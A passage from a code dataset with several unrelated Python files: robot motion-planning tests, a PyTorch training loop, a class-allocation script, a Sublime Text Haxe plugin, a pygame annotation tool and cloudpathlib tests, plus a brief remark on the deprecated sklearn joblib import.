numpy.linalg.inv(T_ee_palm)\n )\nmugiksdrop = r.GetActiveManipulator().FindIKSolutions(H, 
openravepy.IkFilterOptions.CheckEnvCollisions)\n\n\n# create the three problem definitions (encoded as planner parameters xmls)\n\ndef s1():\n r.Release(kbs['mug'])\n kbs['mug'].SetTransform(T_mugT)\n #r.SetDOFValues([0.,0.,0.,0.],[7,8,9,10]) # open\npp1 = openravepy.Planner.PlannerParameters()\npp1.SetExtraParameters(''\n + '5.759 -1.972 -0.22 1.9 0. 0. 0.\\n'\n + '\\n'.join(['{}'.format(' '.join(str(v) for v in q)) for q in mugiksT])\n + '{}'.format(lambda_)\n + '2.0'\n)\n\ndef s2():\n r.Release(kbs['mug'])\n kbs['mug'].SetTransform(reduce(numpy.dot,(\n r.GetActiveManipulator().GetEndEffectorTransform(),\n T_ee_palm,\n numpy.linalg.inv(T_mug_grasp1)\n )))\n #r.SetDOFValues([1.5,1.5,1.5,0.],[7,8,9,10]) # closed\n r.Grab(kbs['mug'])\npp2 = openravepy.Planner.PlannerParameters()\npp2.SetExtraParameters(''\n + '\\n'.join(['{}'.format(' '.join(str(v) for v in q)) for q in mugiksT])\n + '\\n'.join(['{}'.format(' '.join(str(v) for v in q)) for q in mugiksdrop])\n + '{}'.format(lambda_)\n + '2.0'\n)\n\ndef s3():\n r.Release(kbs['mug'])\n kbs['mug'].SetTransform(T_mugD)\n #r.SetDOFValues([0.,0.,0.,0.],[7,8,9,10]) # open\npp3 = openravepy.Planner.PlannerParameters()\npp3.SetExtraParameters(''\n + '\\n'.join(['{}'.format(' '.join(str(v) for v in q)) for q in mugiksdrop])\n + '5.759 -1.972 -0.22 1.9 0. 0. 0.\\n'\n + '{}'.format(lambda_)\n + '2.0'\n)\n\nplans = [[s1,pp1],[s2,pp2],[s3,pp3]]\n\n\n\ntimes = []\ntrajs = []\n\nif w_inter_step:\n\n m = openravepy.RaveCreateModule(e, 'SubsetManager')\n e.Add(m, False, 'ssm')\n p = openravepy.RaveCreatePlanner(e, 'MultiSetPRM')\n p.SendCommand('UseSubsetManager ssm')\n p.SendCommand('SetRoadmap class=RoadmapSampledConst seed=419884521 batch_n=1000 radius=2')\n\n if w_selfcc:\n for name,kb in kbs.items():\n kb.Enable(False)\n m.SendCommand('TagCurrentSubset {} selfcc true'.format(r.GetName()))\n for name,kb in kbs.items():\n kb.Enable(True)\n \n for i,(s,pp) in enumerate(plans):\n \n s()\n m.SendCommand('TagCurrentSubset {} setup{} true'.format(r.GetName(),i+1))\n \n p.InitPlan(r,pp)\n \n t = openravepy.RaveCreateTrajectory(e, '')\n tic = time.time()\n p.PlanPath(t)\n toc = time.time()\n times.append(toc - tic)\n trajs.append(t)\n\n\nelse: # without inter-step\n \n for i,(s,pp) in enumerate(plans):\n \n m = openravepy.RaveCreateModule(e, 'SubsetManager')\n e.Add(m, False, 'ssm')\n p = openravepy.RaveCreatePlanner(e, 'MultiSetPRM')\n p.SendCommand('UseSubsetManager ssm')\n p.SendCommand('SetRoadmap class=RoadmapSampledConst seed=419884521 batch_n=1000 radius=2')\n \n if w_selfcc:\n for name,kb in kbs.items():\n kb.Enable(False)\n m.SendCommand('TagCurrentSubset {} selfcc true'.format(r.GetName()))\n for name,kb in kbs.items():\n kb.Enable(True)\n \n s()\n m.SendCommand('TagCurrentSubset {} setup{} true'.format(r.GetName(),i+1))\n \n p.InitPlan(r,pp)\n \n if w_selfcc:\n p.SendCommand('CacheSetLocation mycache')\n p.SendCommand('CacheLoad 1')\n \n t = openravepy.RaveCreateTrajectory(e, '')\n tic = time.time()\n p.PlanPath(t)\n toc = time.time()\n times.append(toc - tic)\n trajs.append(t)\n \n e.Remove(m)\n \n# compute lengths\ntraj_lens = []\nfor traj in trajs:\n len_rad = 0.0\n for i in range(1,traj.GetNumWaypoints()):\n va = traj.GetWaypoint(i-1)\n vb = traj.GetWaypoint(i)\n len_rad += numpy.linalg.norm(va - vb)\n traj_lens.append(len_rad)\n\nprint('times:', times)\nprint('traj lens:', 
traj_lens)\n","sub_path":"test_multiset/scripts/test_or.py","file_name":"test_or.py","file_ext":"py","file_size_in_byte":7569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"17617377","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\n\nimport time\n\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.externals import joblib\nfrom utils import check_labels, readable_time\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n\ndef train(model, iterator, optimizer, criterion):\n \n epoch_loss = 0\n per_label_preds = [[], [], [], [], [], []]\n per_label_true = [[], [], [], [], [], []]\n \n model.train()\n \n for i, batch in enumerate(iterator):\n \n optimizer.zero_grad()\n X, y = batch \n \n X = X.to(device)\n y = y.to(device)\n \n predictions = model(X)\n \n loss = criterion(predictions, y)\n loss.backward()\n optimizer.step()\n \n # convert true target\n batch_target = y.cpu().detach().numpy()\n logits_cpu = predictions.cpu().detach().numpy()\n\n # per_label_preds\n for j in range(6):\n label_preds = logits_cpu[:, j]\n per_label_preds[j].extend(label_preds)\n per_label_true[j].extend(batch_target[:, j])\n\n # calculate log loss\n epoch_loss += loss.item()\n\n print('\\r[{} / {}]: Loss = {:.4f}'.format(\n i, len(iterator), loss.item(), end=''))\n \n label_auc = []\n\n for i in range(6):\n label_auc.append(roc_auc_score(per_label_true[i], per_label_preds[i]))\n \n return epoch_loss / len(iterator), np.mean(label_auc)\n\n\ndef evaluate(model, iterator, criterion):\n epoch_loss = 0\n per_label_preds = [[], [], [], [], [], []]\n per_label_true = [[], [], [], [], [], []]\n preds = []\n\n model.eval()\n \n with torch.no_grad():\n \n for i, batch in enumerate(iterator):\n X, y = batch\n \n X = X.to(device)\n predictions = model(X)\n \n # convert true target\n logits_cpu = predictions\n \n if not check_labels(y): \n y = y.to(device)\n loss = criterion(predictions, y)\n batch_target = y.cpu().detach().numpy() \n logits_cpu = logits_cpu.cpu().detach().numpy()\n\n preds.append(logits_cpu)\n\n # per_label_preds\n for j in range(6):\n label_preds = logits_cpu[:, j]\n per_label_preds[j].extend(label_preds)\n per_label_true[j].extend(batch_target[:, j])\n\n # calculate log loss\n epoch_loss += loss.item()\n\n print('\\r[{} / {}]: Loss = {:.4f}'.format(\n i, len(iterator), loss.item(), end=''))\n else:\n probs = torch.sigmoid(logits_cpu).cpu().detach().numpy()\n preds.append(probs)\n \n label_auc = []\n\n if len(per_label_preds[0]) > 0:\n for i in range(6):\n label_auc.append(roc_auc_score(per_label_true[i], per_label_preds[i]))\n\n return epoch_loss / len(iterator), np.mean(label_auc) if len(label_auc) > 0 else 0, np.vstack(preds)\n\n\ndef epoch_time(start_time, end_time):\n elapsed_time = end_time - start_time\n elapsed_mins = int(elapsed_time / 60)\n elapsed_secs = int(elapsed_time - (elapsed_mins * 60))\n return elapsed_mins, elapsed_secs\n\n\ndef learn(model, trn_dl, vld_dl, vocab, config):\n vocab_size = len(vocab.itos)\n lr = config['lr']\n\n optimizer = optim.Adam(model.parameters(), lr=lr)\n criterion = nn.BCEWithLogitsLoss()\n\n model = model.to(device)\n criterion = criterion.to(device)\n\n N_EPOCHS = config['N_EPOCHS']\n best_valid_loss = float('inf')\n time_identifier = readable_time()\n\n for epoch in range(N_EPOCHS):\n start_time = time.time()\n \n train_loss, train_auc = train(model, trn_dl, optimizer, criterion)\n if vld_dl is not None: valid_loss, valid_auc, _ = evaluate(model, vld_dl, criterion)\n \n end_time = time.time()\n\n epoch_mins, epoch_secs = epoch_time(start_time, end_time)\n \n if vld_dl is not None:\n if valid_loss < best_valid_loss:\n best_valid_loss = valid_loss\n 
best_model = model\n \n print('Saving best model found so far to disk')\n # save model to results directory\n torch.save(model.state_dict(), config['result_dir'] + config['model_name'] + '_' + time_identifier +'.pth')\n joblib.dump(config, config['result_dir'] + config['model_name'] + 'config_' + time_identifier + '.pkl')\n \n print(f'Epoch: {epoch+1:02} | Epoch Time: {epoch_mins}m {epoch_secs}s')\n print(f'\\tTrain Loss: {train_loss:.3f} | Train AUC: {train_auc:.3f}')\n print(f'\\t Val. Loss: {valid_loss:.3f} | Val. AUC: {valid_auc:.3f}') \n else:\n print(f'Epoch: {epoch+1:02} | Epoch Time: {epoch_mins}m {epoch_secs}s')\n print(f'\\tTrain Loss: {train_loss:.3f} | Train AUC: {train_auc:.3f}')\n \n # save full trained model to disk\n if vld_dl is None:\n torch.save(model.state_dict(), config['result_dir'] + config['model_name'] + '_' + time_identifier +'_full.pth')\n joblib.dump(config, config['result_dir'] + config['model_name'] + 'config_full' + time_identifier + '.pkl')\n \n return model\n\n\ndef predictions(model, tst_dl, criterion, test_labels, fn):\n _, _, final_preds = evaluate(model, tst_dl, criterion=None)\n\n df = test_labels.copy()\n df.iloc[:, 1:] = final_preds\n df.to_csv(fn, index=False)\n\n return df\n","sub_path":"src/cnn_sent_classification/learner.py","file_name":"learner.py","file_ext":"py","file_size_in_byte":5692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
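
`from sklearn.externals import joblib` was deprecated in scikit-learn 0.21 and removed in 0.23, so the import above fails on newer environments; the standalone `joblib` package provides the same `dump`/`load` API. A compatibility shim if this script has to run on both:

try:
    import joblib  # standalone package, the modern home of dump/load
except ImportError:
    from sklearn.externals import joblib  # only exists on scikit-learn < 0.23
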
+{"seq_id":"123611091","text":"import csv\n\n\nx1={\"None\":[],\n \"economics\":[],\n \"geography\":[],\n \"chemistry\":[],\n \"physics\":[],\n }\n\nx2={\"bafs\":[],\n \"biology\":[],\n \"chistory\":[],\n \"economics\":[],\n \"ict\":[],\n \"physics\":[],\n }\n\nx3={\"biology\":[],\n \"chemistry\":[],\n \"cliterature\":[],\n \"geography\":[],\n \"history\":[],\n \"va\":[],\n \"m2\":[],\n }\n\nsubject_column=[\"x1\",\"x2\",\"x3\"]\n\npreference_column=[\"pref1\",\"pref2\",\"pref3\",\"pref4\",\"pref5\",\"pref6\",\n \"pref7\",\"pref8\",\"pref9\",\"pref10\",\"pref11\",\"pref12\"]\n\nsubject_reference={\"x1\":x1,\n \"x2\":x2,\n \"x3\":x3,\n }\n\n\nwith open(\"/home/aerobucket/python/testing/random_subject.csv\") as subject:\n csvreader=list(csv.DictReader(subject,delimiter=\",\"))\n \n name_to_score={}\n average=[]\n name_list=[]\n\n for row in csvreader:\n name_to_score[float(row[\"average\"])]=row[\"name\"]\n average.append(float(row[\"average\"]))\n name_list.append(row[\"name\"])\n \n run_times=len(average)\n class_size=35\n\n # execute for every person\n for i in range(run_times):\n\n max_score=max(average)\n name=name_to_score[max_score] # find the person with higher marks\n\n # find the correct row \n for row in csvreader:\n \n if row[\"name\"] == name:\n\n # append electives to the classes\n for elective in subject_column:\n subj=row[elective]\n \n # check for people in the class\n if len(subject_reference[elective][subj]) < class_size:\n subject_reference[elective][subj].append(name) \n \n else:\n for preference in preference_column:\n subj_1=row[preference]\n \n if subj_1 in subject_reference[elective].keys() == True:\n if len(subject_reference[elective][subj_1]) < class_size:\n subject_reference[elective][subj_1].append(name)\n break \n\n average.remove(max_score)\n \n\nresults_header=[\"name\",\"x1\",\"x2\",\"x3\"]\n\n\nwith open(\"results.csv\",\"w\") as results:\n result_writer=csv.DictWriter(results,fieldnames=results_header)\n result_writer.writeheader()\n \n for n in name_list:\n \n row_dict={\"name\":n,}\n \n for elective_name,elective in subject_reference.items():\n \n for subject_name,subject in elective.items():\n \n if n in subject:\n row_dict[elective_name]=subject_name\n \n result_writer.writerow(row_dict)\n \n \n \n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"subject_selection.py","file_name":"subject_selection.py","file_ext":"py","file_size_in_byte":2876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"180496489","text":"# 자세한 풀이: https://breathtaking-life.tistory.com/118\ndef solution(s):\n result = []\n relation = {'zero': '0', 'one': '1', 'two': '2', 'three': '3', 'four': '4',\n 'five': '5', 'six': '6', 'seven': '7', 'eight': '8', 'nine': '9'}\n\n arr = []\n for c in s:\n if c in relation.values(): \t\t# 문자가 0~9일 경우\n result.append(c) \t\t# 리스트에 바로 추가\n else: \t\t# 0~9가 아닐경우 변환 과정을 거침\n arr.append(c)\n tmp = ''.join(arr)\n if tmp in relation.keys():\n arr = []\n result.append(relation[tmp])\n\n return int(''.join(result))\n\n\n# 다른 풀이\nnum_dic = {\"zero\": \"0\", \"one\": \"1\", \"two\": \"2\", \"three\": \"3\", \"four\": \"4\",\n \"five\": \"5\", \"six\": \"6\", \"seven\": \"7\", \"eight\": \"8\", \"nine\": \"9\"}\n\n\ndef solution(s):\n answer = s\n for key, value in num_dic.items():\n answer = answer.replace(key, value)\n return int(answer)","sub_path":"jisu/week5/숫자 문자열과 영단어.py","file_name":"숫자 문자열과 영단어.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"299774095","text":"import sublime\nimport sublime_plugin\nimport re\n\nSCOPE_VAR = 'meta.variable.haxe.2'\nSCOPE_VAR_NAME = 'entity.name.variable.haxe.2'\nSCOPE_FUNC = 'meta.method.haxe.2'\nSCOPE_FUNC_BLOCK = 'meta.method.block.haxe.2'\nSCOPE_FUNC_NAME = 'entity.name.function.haxe.2'\nSCOPE_STATIC = 'meta.static.haxe.2'\nSCOPE_TYPE = 'meta.type'\nSCOPE_TYPE_BLOCK = 'meta.type.block.haxe.2'\nSCOPE_TYPE_NAME = 'entity.name.type.class.haxe.2'\n\nFIELD_FUNC = 'function'\nFIELD_VAR = 'var'\nFIELD_STATIC_FUNC = 'static function'\nFIELD_STATIC_VAR = 'static var'\n\nre_word = re.compile('^[_a-z]\\w*$')\n\n\ndef count_blank_lines(view, pos):\n whitespaces = ' \\t'\n src = view.substr(sublime.Region(0, view.size()))\n before, after = 0, 0\n\n for i in range(pos - 1, 0, -1):\n c = src[i]\n if c == '\\n':\n before += 1\n elif c not in whitespaces:\n break\n\n for i in range(pos, view.size()):\n c = src[i]\n if c == '\\n':\n after += 1\n elif c not in whitespaces:\n break\n\n return before, after\n\n\ndef filter_regions(inners, outers):\n contains = []\n ncontains = []\n ii, io, ni, no = 0, 0, len(inners), len(outers)\n\n if no == 0:\n return contains, inners[:]\n\n while io < no and ii < ni:\n inner = inners[ii]\n outer = outers[io]\n\n if outer.contains(inner):\n contains.append(inner)\n io += 1\n ii += 1\n continue\n\n if inner.begin() > outer.begin():\n io += 1\n else:\n ncontains.append(inner)\n ii += 1\n\n while ii < ni:\n ncontains.append(inners[ii])\n ii += 1\n\n return contains, ncontains\n\n\ndef find_cur_region(view, selector, as_string=False):\n rgns = view.find_by_selector(selector)\n pos = view.sel()[0].begin()\n\n for rgn in rgns:\n if rgn.contains(pos):\n if as_string:\n return view.substr(rgn)\n else:\n return rgn\n\n return None\n\n\ndef find_line_start_pos(view, pos):\n rgn = view.line(pos)\n pos = rgn.begin()\n line = view.substr(rgn)\n for c in line:\n if c == ' ' or c == '\\t':\n pos += 1\n else:\n break\n\n return pos\n\n\ndef find_regions(view, selector, in_region=None, incl_string=False):\n rgns = view.find_by_selector(selector)\n regions = []\n\n for rgn in rgns:\n if in_region is not None and in_region.contains(rgn):\n if incl_string:\n regions.append((rgn, view.substr(rgn)))\n else:\n regions.append(rgn)\n\n return regions\n\n\ndef get_context(view):\n ctx = {}\n ctx['view'] = view\n\n pos = view.sel()[0].begin()\n ctx['scope'] = view.scope_name(pos)\n\n word = get_context_word(view)\n if word:\n ctx['word'] = word\n\n if SCOPE_TYPE in ctx['scope']:\n ctx['type'] = get_context_type(view, ctx['scope'])\n\n if SCOPE_FUNC in ctx['scope']:\n ctx['function'] = get_context_function(view)\n\n return ctx\n\n\ndef get_context_function(view):\n ctx = {}\n\n rgn = find_cur_region(view, SCOPE_FUNC)\n ctx['region'] = rgn\n ctx['name'] = find_regions(view, SCOPE_FUNC_NAME, rgn, True)[0][1]\n ctx['block'] = find_regions(view, SCOPE_FUNC_BLOCK, rgn)[0]\n\n return ctx\n\n\ndef get_context_type(view, scope):\n ctx = {}\n\n type_groups = ('abstract', 'class', 'enum', 'interface', 'typedef')\n type_scope = None\n for group in type_groups:\n type_scope = 'meta.type.%s.haxe.2' % group\n if type_scope in scope:\n ctx['group'] = group\n break\n\n type_rgn = find_cur_region(view, type_scope)\n\n v_rgns = find_regions(view, SCOPE_VAR, type_rgn)\n vname_rgns = find_regions(view, SCOPE_VAR_NAME, type_rgn)\n f_rgns = find_regions(view, SCOPE_FUNC, type_rgn)\n fname_rgns = find_regions(view, SCOPE_FUNC_NAME, type_rgn)\n s_rgns = find_regions(view, SCOPE_STATIC, type_rgn)\n\n sv_rgns, v_rgns = 
filter_regions(v_rgns, s_rgns)\n sf_rgns, f_rgns = filter_regions(f_rgns, s_rgns)\n\n svname_rgns, vname_rgns = filter_regions(vname_rgns, sv_rgns)\n sfname_rgns, fname_rgns = filter_regions(fname_rgns, sf_rgns)\n\n ctx['region'] = type_rgn\n ctx['name'] = find_regions(view, SCOPE_TYPE_NAME, type_rgn, True)[0][1]\n ctx['block'] = find_regions(view, SCOPE_TYPE_BLOCK, type_rgn)[0]\n\n def combine(field_group, field_rgns, field_name_rgns):\n lst = []\n\n for i in range(0, len(field_rgns)):\n lst.append((\n field_group,\n view.substr(field_name_rgns[i]),\n field_rgns[i]))\n\n return lst\n\n ctx[FIELD_VAR] = combine(FIELD_VAR, v_rgns, vname_rgns)\n ctx[FIELD_STATIC_VAR] = combine(FIELD_STATIC_VAR, sv_rgns, svname_rgns)\n ctx[FIELD_FUNC] = combine(FIELD_FUNC, f_rgns, fname_rgns)\n ctx[FIELD_STATIC_FUNC] = combine(FIELD_STATIC_FUNC, sf_rgns, sfname_rgns)\n\n return ctx\n\n\ndef get_fieldnames(context):\n lst = []\n\n lst.extend([tup[1] for tup in context['type'][FIELD_VAR]])\n lst.extend([tup[1] for tup in context['type'][FIELD_STATIC_VAR]])\n lst.extend([tup[1] for tup in context['type'][FIELD_FUNC]])\n lst.extend([tup[1] for tup in context['type'][FIELD_STATIC_FUNC]])\n\n return lst\n\n\ndef get_context_word(view):\n pos = view.sel()[0].begin()\n word_rgn = view.word(pos)\n word = view.substr(word_rgn)\n scope = view.scope_name(word_rgn.begin())\n\n if not re_word.match(word):\n return None\n\n ignore_scopes = (\n 'comment', 'constant', 'entity', 'keyword', 'storage', 'string')\n for sc in ignore_scopes:\n if sc in scope:\n return None\n\n return word\n\n\ndef get_indent(view, pos):\n return ''\n\n\ndef is_haxe_scope(view):\n return view.score_selector(0, \"source.haxe.2\") > 0\n\n\ndef set_pos(view, pos):\n view.sel().clear()\n view.sel().add(sublime.Region(pos, pos))\n view.show_at_center(pos)\n\n","sub_path":"features/haxe_generate_code_helper.py","file_name":"haxe_generate_code_helper.py","file_ext":"py","file_size_in_byte":5893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
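
`filter_regions` walks two sorted region lists with a pair of indices and partitions the inner regions by whether some outer region contains them. It only relies on `begin()` and `contains()`, so it can be exercised without Sublime by substituting a tiny stand-in for `sublime.Region` (class and values below are hypothetical):

class Span:
    """Minimal stand-in for sublime.Region: begin() and contains() only."""
    def __init__(self, a, b):
        self.a, self.b = a, b
    def begin(self):
        return self.a
    def contains(self, other):
        return self.a <= other.a and other.b <= self.b
    def __repr__(self):
        return f"Span({self.a}, {self.b})"

inners = [Span(1, 3), Span(5, 6), Span(10, 12)]
outers = [Span(0, 4), Span(9, 13)]
contained, rest = filter_regions(inners, outers)
print(contained)  # [Span(1, 3), Span(10, 12)]
print(rest)       # [Span(5, 6)]
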
+{"seq_id":"285273556","text":"import pygame\nimport sys\nimport random\nimport numpy as np\nfrom math import sqrt\nimport matplotlib.pyplot as plt\nfrom scipy import ndimage\nimport os\nfrom buttons import*\n\ndef event(surface, pos, todraw,rad, screen, redo, redorad, index, pictures, prevind, txt, height, width, save_index, key_index, label1, label2, count_sub):\n r1 = pygame.Rect((S_HEIGHT+20,0),(170, S_WIDTH+150))\n r2 = pygame.Rect((0,S_WIDTH+20),(S_HEIGHT+200, 170))\n r3 = pygame.Rect((0,0),(20, S_WIDTH+200))\n r4 = pygame.Rect((0,0),(S_HEIGHT+20, 20))\n key_state = pygame.key.get_pressed()\n #print(key_index)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n keys = pygame.key.get_pressed() \n if (event.key == pygame.K_k): # or (keys[pygame.K_r]):\n key_index = (key_index+1)%len(todraw) \n text_render(surface, surface,label1, label2, todraw) \n for i in range(0,len(todraw)):\n pygame.draw.circle(surface, clr1, (todraw[i]), int(rad[i]),bor_size)\n pygame.draw.circle(surface, clr3, (todraw[key_index]), int(rad[key_index]),bor_size)\n screen.blit(surface, (0,0))\n pygame.display.update()\n elif event.key == pygame.K_g:\n for i in range(0,len(todraw)):\n pygame.draw.circle(surface, clr1, (todraw[i]), int(rad[i]),bor_size)\n pygame.draw.circle(surface, clr3, (todraw[key_index]), int(rad[key_index]),bor_size)\n screen.blit(surface, (0,0))\n pygame.display.update()\n elif (event.key == pygame.K_RIGHT)or (keys[pygame.K_RIGHT]):\n prevind = index\n save_index = (index+1)%len(pictures)+ count_sub\n index = (index+ 1)%len(pictures)\n text_render(surface, surface,label1, label2, todraw)\n elif (event.key == pygame.K_LEFT)or (keys[pygame.K_LEFT]):\n prevind = index\n save_index = (index-1)%len(pictures)+ count_sub\n index = (index-1)%len(pictures)\n text_render(surface, surface,label1, label2, todraw)\n elif (event.key == pygame.K_SPACE):\n img = pygame.surfarray.pixels3d(screen)\n img = img[20:S_WIDTH+20,20:S_HEIGHT+20,:]\n img = ndimage.rotate(img,90)\n img = img[::-1,:]\n if len(pictures)>0:\n org_image = plt.imread(f\"{dir}/{pictures[index]}\")\n #plt.imsave(f\"{dir_save}/{save_index}.jpeg\", org_image)\n with open(f\"{txtsave}/{txt[index]}\", 'w') as f:\n for i in range(len(todraw)):\n f.write(f\"{int((todraw[i][0]-19)*width/S_WIDTH)}\\t{int((todraw[i][1]-19)*height/S_HEIGHT)}\\t{int(0.5+rad[i]*width/S_WIDTH)}\\t{label1[i]}\\t{label2[i]}\\n\")\n save_index = (index+1)%len(pictures) + count_sub\n prevind = index\n index = (index+ 1)%len(pictures)\n elif (event.key == pygame.K_c):\n if len(todraw)>0:\n redo= todraw\n todraw = []\n redorad = rad\n rad = []\n screen.blit(surface, (0,0))\n pygame.display.update()\n\n\n # Classify according to the keys\n elif (event.key == pygame.K_0):\n label1[key_index] = 0\n text_render(surface, surface,label1, label2, todraw)\n for i in range(0,len(todraw)):\n pygame.draw.circle(surface, clr1, (todraw[i]), int(rad[i]),bor_size) \n pygame.draw.circle(surface, clr3, (todraw[key_index]), int(rad[key_index]),bor_size)\n screen.blit(surface, (0,0))\n pygame.display.update()\n elif (event.key == pygame.K_1):\n label1[key_index] = 0\n text_render(surface, surface,label1, label2, todraw)\n for i in range(0,len(todraw)):\n pygame.draw.circle(surface, clr1, (todraw[i]), int(rad[i]),bor_size)\n pygame.draw.circle(surface, clr3, (todraw[key_index]), int(rad[key_index]),bor_size)\n screen.blit(surface, (0,0))\n pygame.display.update()\n elif (event.key == pygame.K_2):\n label1[key_index] = 
1\n text_render(surface, surface,label1, label2, todraw)\n for i in range(0,len(todraw)):\n pygame.draw.circle(surface, clr1, (todraw[i]), int(rad[i]),bor_size) \n pygame.draw.circle(surface, clr3, (todraw[key_index]), int(rad[key_index]),bor_size)\n screen.blit(surface, (0,0))\n pygame.display.update()\n elif (event.key == pygame.K_3):\n label1[key_index] = 2\n text_render(surface, surface,label1, label2, todraw)\n for i in range(0,len(todraw)):\n pygame.draw.circle(surface, clr1, (todraw[i]), int(rad[i]),bor_size)\n pygame.draw.circle(surface, clr3, (todraw[key_index]), int(rad[key_index]),bor_size)\n screen.blit(surface, (0,0))\n pygame.display.update()\n elif (event.key == pygame.K_4):\n label1[key_index] = 3\n text_render(surface, surface,label1, label2, todraw)\n for i in range(0,len(todraw)):\n pygame.draw.circle(surface, clr1, (todraw[i]), int(rad[i]),bor_size)\n\n pygame.draw.circle(surface, clr3, (todraw[key_index]), int(rad[key_index]),bor_size)\n screen.blit(surface, (0,0))\n pygame.display.update()\n elif (event.key == pygame.K_5):\n label1[key_index] = 4\n text_render(surface, surface,label1, label2, todraw)\n for i in range(0,len(todraw)):\n pygame.draw.circle(surface, clr1, (todraw[i]), int(rad[i]),bor_size)\n pygame.draw.circle(surface, clr3, (todraw[key_index]), int(rad[key_index]),bor_size)\n screen.blit(surface, (0,0))\n pygame.display.update()\n elif (event.key == pygame.K_6):\n label1[key_index] = 5\n text_render(surface, surface,label1, label2, todraw)\n for i in range(0,len(todraw)):\n pygame.draw.circle(surface, clr1, (todraw[i]), int(rad[i]),bor_size)\n pygame.draw.circle(surface, clr3, (todraw[key_index]), int(rad[key_index]),bor_size)\n screen.blit(surface, (0,0))\n pygame.display.update()\n elif (event.key == pygame.K_h):\n label2[key_index] = 72\n text_render(surface, surface,label1, label2, todraw)\n for i in range(0,len(todraw)):\n pygame.draw.circle(surface, clr1, (todraw[i]), int(rad[i]),bor_size)\n pygame.draw.circle(surface, clr3, (todraw[key_index]), int(rad[key_index]),bor_size)\n screen.blit(surface, (0,0))\n pygame.display.update()\n elif (event.key == pygame.K_t):\n label2[key_index] = 84\n text_render(surface, surface, label1, label2, todraw)\n for i in range(0,len(todraw)):\n pygame.draw.circle(surface, clr1, (todraw[i]), int(rad[i]),bor_size)\n pygame.draw.circle(surface, clr3, (todraw[key_index]), int(rad[key_index]),bor_size)\n screen.blit(surface, (0,0))\n pygame.display.update()\n pygame.display.update()\n elif event.type == pygame.KEYUP:\n if (event.key == pygame.K_g):\n text_render(surface, surface, label1, label2, todraw)\n for i in range(0,len(todraw)):\n pygame.draw.circle(surface, clr1, (todraw[i]), int(rad[i]),bor_size)\n pygame.draw.circle(surface, clr3, (todraw[key_index]), int(rad[key_index]),bor_size)\n screen.blit(surface, (0,0))\n pygame.display.update() \n return pos, todraw, rad, redo, redorad, index, prevind, txt, save_index, key_index, label1, label2\n\n\ndef folder_img(dir, txt):\n pictures = sorted(os.listdir(dir))\n txtfiles = [] #sorted(os.listdir(txtfolder)) \n pic = []\n txt2 = []\n txt3 = []\n # test = [elem[:-3] for elem in pictures]\n test = [elem[:-3] for elem in txtfiles]\n for picture in pictures:\n if picture[-3:] == \"jpg\" or picture[-3:] == \"png\" or picture[-3:] == \"peg\":\n pic.append(picture)\n test_jpg = [elem[:-3] for elem in pic]\n test_jpeg = [elem[:-4] for elem in pic]\n for pic2 in pic:\n if (pic2[:-4] not in test) and (pic2[-3:] == \"jpg\" or pic2[-3:] == \"png\"):\n 
txtfiles.append(f\"{pic2[:-4]}.txt\")\n elif pic2[:-5] not in test:\n txtfiles.append(f\"{pic2[:-5]}.txt\")\n txtfiles = sorted(txtfiles)\n for txtf in txtfiles:\n if txtf[-4:] == \".csv\" or txtf[-4:] == \".txt\":\n txt2.append(txtf)\n # print(txt2)\n for t in txt2:\n if t[:-3] in test_jpg or t[:-3] in test_jpeg:\n txt3.append(t)\n #tixt3 = sorted(txt3)\n print(f\" The images you have in the directory are {pic}\")\n print(f\" The txt files you have in the directory are {txt3}\")\n return pic, txt3\n","sub_path":"Classifier-GUI/src/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":9485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"518929647","text":"from datetime import datetime\nimport os\nfrom pathlib import PurePosixPath\nfrom time import sleep\n\nimport pytest\n\nfrom cloudpathlib.exceptions import CloudPathIsADirectoryError, DirectoryNotEmptyError\n\n\ndef test_file_discovery(rig):\n p = rig.create_cloud_path(\"dir_0/file0_0.txt\")\n assert p.exists()\n\n p2 = rig.create_cloud_path(\"dir_0/not_a_file\")\n assert not p2.exists()\n p2.touch()\n assert p2.exists()\n p2.unlink()\n\n p3 = rig.create_cloud_path(\"dir_0/\")\n assert p3.exists()\n assert len(list(p3.iterdir())) == 3\n assert len(list(p3.glob(\"**/*\"))) == 3\n\n with pytest.raises(CloudPathIsADirectoryError):\n p3.unlink()\n\n with pytest.raises(DirectoryNotEmptyError):\n p3.rmdir()\n p3.rmtree()\n assert not p3.exists()\n\n p4 = rig.create_cloud_path(\"\")\n assert p4.exists()\n\n assert len(list(p4.iterdir())) == 1 # only bucket/dir_1/ should still exist\n assert len(list(p4.glob(\"**/*\"))) == 4\n\n assert list(p4.glob(\"**/*\")) == list(p4.rglob(\"*\"))\n\n\ndef test_file_read_writes(rig, tmp_path):\n p = rig.create_cloud_path(\"dir_0/file0_0.txt\")\n p2 = rig.create_cloud_path(\"dir_0/not_a_file\")\n p3 = rig.create_cloud_path(\"\")\n\n text = \"lalala\" * 10_000\n\n p.write_text(text)\n assert p.read_text() == text\n p2.write_text(text)\n\n # sleep between writes to p to ensure different\n # modified times\n sleep(1)\n\n p.write_bytes(p2.read_bytes())\n assert p.read_text() == p2.read_text()\n\n before_touch = datetime.now()\n sleep(1)\n p.touch()\n if not getattr(rig, \"is_custom_s3\", False):\n # Our S3Path.touch implementation does not update mod time for MinIO\n assert datetime.fromtimestamp(p.stat().st_mtime) > before_touch\n\n # no-op\n p.mkdir()\n\n assert p.etag is not None\n\n dest = rig.create_cloud_path(\"dir2/new_file0_0.txt\")\n assert not dest.exists()\n p.rename(dest)\n assert dest.exists()\n\n assert not p.exists()\n p.touch()\n dest.replace(p)\n assert p.exists()\n\n dl_file = tmp_path / 